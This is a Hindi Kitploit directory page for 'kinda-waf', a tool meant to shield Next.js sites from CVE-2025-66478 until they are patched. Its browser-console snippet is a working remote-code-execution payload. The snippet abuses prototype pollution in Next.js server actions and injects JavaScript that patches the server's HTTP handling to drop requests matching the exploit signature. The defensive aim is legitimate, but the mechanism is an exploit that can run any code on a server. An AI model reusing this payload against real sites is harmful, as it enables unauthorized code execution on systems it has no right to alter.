Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-66478-kinda-waf — आइए वेबसाइटों को तब तक सुरक्षित रखने में मदद करें जब तक उन्हें उचित रूप से पैच नहीं किया जाता! | Kitploit
उपकरण/GitHubGitHub/aiexz/cve-2025-66478-kinda-waf
भेद्यता स्कैनरशोषणआईडीएस/आईपीएस से बचनाWAF बाईपासवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubaiexz/cve-2025-66478-kinda-waf

CVE-2025-66478-kinda-waf

आइए वेबसाइटों को तब तक सुरक्षित रखने में मदद करें जब तक उन्हें उचित रूप से पैच नहीं किया जाता!

रिपॉजिटरी देखें
8 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

kinda-waf

सरल, अस्थायी WAF सुरक्षा परीक्षक जो एक विशिष्ट पेलोड अनुक्रम को लक्षित करता है।

आइए वेबसाइटों को तब तक सुरक्षित रहने में मदद करें जब तक उन्हें ठीक से पैच नहीं कर दिया जाता!

उद्देश्य

CVE-2025-66478 से सुरक्षा प्रदान करें, विशिष्ट पेलोड सिग्नेचर वाले अनुरोधों का पता लगाकर उन्हें ब्लॉक करें। इससे वैध ट्रैफ़िक पर कोई असर नहीं पड़ना चाहिए और जो वेबसाइटें ठीक से रखरखाव नहीं करतीं, उन्हें बचाना चाहिए।

और यह रीस्टार्ट के बाद रीसेट हो जाता है, इसलिए यह कोई स्थायी समाधान नहीं है

आवश्यकताएँ

  • Python 3

उपयोग

स्क्रिप्ट चलाएँ (डिफ़ॉल्ट localhost):

root@kitploit:~
python main.py

किसी विशिष्ट URL के साथ चलाएँ:

root@kitploit:~
python main.py http://example.com/

और ब्राउज़र में चलाने के लिए संस्करण:

हाँ, इसे सीधे ब्राउज़र कंसोल में चलाएँ:

root@kitploit:~
const formData = new FormData();

const actionPayload = {"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"throw(async()=>{const t=await import(\"node:http\"),e=t.IncomingMessage.prototype.emit;t.IncomingMessage.prototype.emit=function(t,...n){if(\"data\"===t&&n.length>0){const t=this.headers[\"content-type\"]||\"\";if(t.includes(\"multipart\")||t.includes(\"json\")||t.includes(\"text\")){const t=n[0].toString(\"utf8\");if(t.includes('\"then\":\"$1:__proto__:then\"')||t.includes('\"get\":\"$1:constructor:constructor\"')){const t=this.socket._httpMessage;if(t&&!t.headersSent)try{return t.writeHead(500,{\"Content-Type\":\"text/plain; charset=utf-8\",Connection:\"close\",\"X-Powered-By\":\"Next.js\"}),t.end('0:{\"a\":\"$@1\",\"f\":\"\",\"b\":\"cwwYVM2ZWm4vgZG3xVPfk\"}\\n1:E{\"digest\":\"2494231801\"}',(()=>this.destroy())),!1}catch(t){this.destroy()}else this.destroy();return!1}}}return e.apply(this,arguments)}})(),Object.assign(new Error(\"x\"),{digest:\"WAF Installed\"});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}

formData.append("0", JSON.stringify(actionPayload));
formData.append("1", '"$@0"');
formData.append("2", "[]");

fetch("/", {
  method: "POST",
  body: formData,
  headers: {
    "Next-Action": "x",
  }
})
  .then(async res => console.log(await res.text()));
टूल डाउनलोड करें